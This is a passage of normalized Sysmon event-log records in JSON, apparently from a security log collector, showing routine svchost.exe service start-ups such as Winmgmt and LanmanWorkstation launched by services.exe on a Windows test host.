"747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s IKEEXT", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001046700100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2496", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.068Z", "type": "raw", "uuid": "930422d5-d25b-49fb-a9a0-cf5148ea3234"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8386411Z\"},\"EventRecordID\":\"27605\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.067\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-001019700100}\"},{\"Name\":\"ProcessId\",\"text\":\"2488\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-001019700100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2488", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.067Z", "type": "raw", "uuid": "b0981dd8-9907-4f66-befd-4728ee790e6e"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.8366184Z\"},\"EventRecordID\":\"27597\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.062\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010366f0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2476\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetSvcs -p -s iphlpsvc\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetSvcs -p -s iphlpsvc", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010366f0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2476", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.062Z", "type": "raw", "uuid": "c23d7fec-a17d-456a-99e9-9266c090165b"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.7647850Z\"},\"EventRecordID\":\"27589\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:18.022\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b766-5ea4-0000-0010c4680100}\"},{\"Name\":\"ProcessId\",\"text\":\"2408\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k NetworkService -p -s LanmanWorkstation\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\NETWORK SERVICE\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e4030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e4\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e4030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:network service@nt authority", "object.account.name": "network service", "object.account.privileges": "System", "object.account.session_id": "996", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k NetworkService -p -s LanmanWorkstation", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b766-5ea4-0000-0010c4680100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2408", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:network service@nt authority", "subject.account.name": "network service", "subject.account.privileges": "System", "subject.account.session_id": "996", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:18.022Z", "type": "raw", "uuid": "33467d8b-9514-43c5-a058-c49d0b2dc271"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.5835292Z\"},\"EventRecordID\":\"27585\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.936\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-001016620100}\"},{\"Name\":\"ProcessId\",\"text\":\"2364\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Winmgmt\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Winmgmt", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-001016620100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2364", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.936Z", "type": "raw", "uuid": "c4670f5f-1213-43ea-8342-34abd2451ec4"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4841868Z\"},\"EventRecordID\":\"27575\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 22:19:17.775\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-b765-5ea4-0000-0010344d0100}\"},{\"Name\":\"ProcessId\",\"text\":\"2204\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Host Process for Windows Services\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"OriginalFileName\",\"text\":\"svchost.exe\"},{\"Name\":\"CommandLine\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs -p -s ShellHWDetection\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-b764-5ea4-0000-00106f550000}\"},{\"Name\":\"ParentProcessId\",\"text\":\"584\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\services.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\services.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-b764-5ea4-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s ShellHWDetection", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.guid": "747f3d96-b765-5ea4-0000-0010344d0100", "object.process.hash.imphash": "247B9220E5D9B720A82B2C8B5069AD69", "object.process.hash.md5": "8A0A29438052FAED8A2532DA50455756", "object.process.hash.sha1": "A1385CE20AD79F55DF235EFFD9780C31442AA234", "object.process.hash.sha256": "7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6", "object.process.id": "2204", "object.process.meta": "Description:Host Process for Windows Services | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "svchost.exe", "object.process.original_name": "svchost.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\services.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\services.exe", "object.process.parent.guid": "747f3d96-b764-5ea4-0000-00106f550000", "object.process.parent.id": "584", "object.process.parent.name": "services.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-07T17:28:14.503Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-04-25T22:19:17.775Z", "type": "raw", "uuid": "58945f8f-9132-48fb-a61b-391ca63992f8"} +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-04-25T22:19:27.4818918Z\"},\"EventRecordID\":\"27570\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2796\",\"ThreadID\":\"3572\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2020-04-25 